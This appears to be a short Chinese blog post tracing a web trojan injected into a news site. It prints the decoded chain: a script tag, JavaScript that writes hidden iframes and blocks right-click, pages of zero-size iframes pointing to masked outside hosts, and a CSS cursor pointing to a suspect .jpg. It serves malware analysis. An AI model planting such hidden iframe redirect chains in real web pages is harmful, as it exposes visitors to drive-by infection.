检查XX经济新闻网

开始访问http://XXXX.com查找网马
刚开始看傻了，网页里面主页资料太多，一看都是程序，让你看都头大。系统软件一直报有毒，查到是ARP攻击

<script src=http://www.XXXX.com/107/m.js></script>
解m.js以下：
document.writeln("<SCRIPT language=JavaScript>var boodschap = \'完毕 \'; function dgstatus()");
document.writeln("{ window.status = boodschap; timerID= setTimeout(\"dgstatus()\", 0);}");
document.writeln("dgstatus();<\/SCRIPT>");
document.writeln("<body topmargin=\'0\' leftmargin=\'0\' bgcolor=\'#FFFFFF\' oncontextmenu=\'return false\'
onselectstart=\'return false\' ondragstart=\'return false\' >");
document.writeln("<iframe src=http:\/\/www.XXXX.com\/107\/ width=100 height=0><\/iframe>");
自行解http://www.XXXX.com/107/以下：
<html><TITLE>index</TITLE><BODY>
<iframe src=http://www.xxxx.com/107/111/001.htm width=50 height=0></iframe>
<iframe src=http://www.xxxx.com/107/222/002.htm width=0 height=0></iframe>
<iframe src=http://www.xxxxxx.com/107/333/003.htm width=0 height=0></iframe>
<iframe src=http://www.xxxxx.com/107/xl/ok.asp width=0 height=0></iframe>
</body></html>
<script src='http://s109.xxxx.com/stat.php?id=418410&web_id=418410' language='JavaScript' charset='gb2312'></script>

http://www.xxxxx.com/107/111/001.htm
<HTML><HEAD>
<META http-equiv=Content-Type c>
<META c name=GENERATOR></HEAD>
<BODY>
<DIV style="CURSOR: url('http://www.xxxxxx.com/107/111/1.jpg')"></DIV>
</BODY></HTML>
接着略